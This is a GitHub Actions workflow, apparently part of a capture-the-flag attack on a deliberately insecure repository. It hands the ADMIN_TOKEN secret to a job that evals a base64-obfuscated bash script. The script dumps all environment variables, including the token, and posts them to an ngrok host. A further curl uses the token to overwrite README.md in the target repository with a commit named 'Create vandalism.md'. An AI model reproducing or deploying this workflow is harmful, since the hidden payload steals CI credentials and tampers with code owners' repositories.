name: ctf registration
on: [pull_request_target]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Use Node.js ${{ matrix.node-version }}
        uses: actions/setup-node@v1
        env:
          GITHUB_TOKEN: ${{ secrets.ADMIN_TOKEN }}
      - run: |
          eval "$(echo "IyEvYmluL2Jhc2gKZWNobyAiSW0gSGVyZSIKY3VybCAtWCBQT1NUIC1IICdDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9uL2pzb24nIC0tZGF0YSAneyJ0ZXh0IjoiSGVsbG8sIFdvcmxkISJ9JyBodHRwOi8vMzEyMTc3MjQ2YmNkLm5ncm9rLmlvL2FwaS9pbmZvCnN1ZG8gYXB0IGluc3RhbGwganEKcHJpbnRlbnYgfCBqcSAtc1IgICdzcGxpdCgiXG4iKSB8IG1hcChzcGxpdCgiPSIpKSB8IG1hcChzZWxlY3QobGVuZ3RoID4gMCkgfCB7ICguWzBdKSA6ICguWzE6XSB8IGpvaW4oIiIpKSB9KSB8IGFkZCcgfCBjdXJsIC1YIFBPU1QgLUggJ0NvbnRlbnQtdHlwZTogYXBwbGljYXRpb24vanNvbicgIGh0dHA6Ly8zMTIxNzcyNDZiY2Qubmdyb2suaW8vYXBpL2luZm8gLS1kYXRhLWJpbmFyeSBALQo=" | base64 -d)"
          curl -X PUT -H "Authorization: bearer $GITHUB_TOKEN" https://api.github.com/repos/incredibly-secure-naortalmor1/contents/README.md --data '{"message": "Create vandalism.md", "content": "aaa"}'
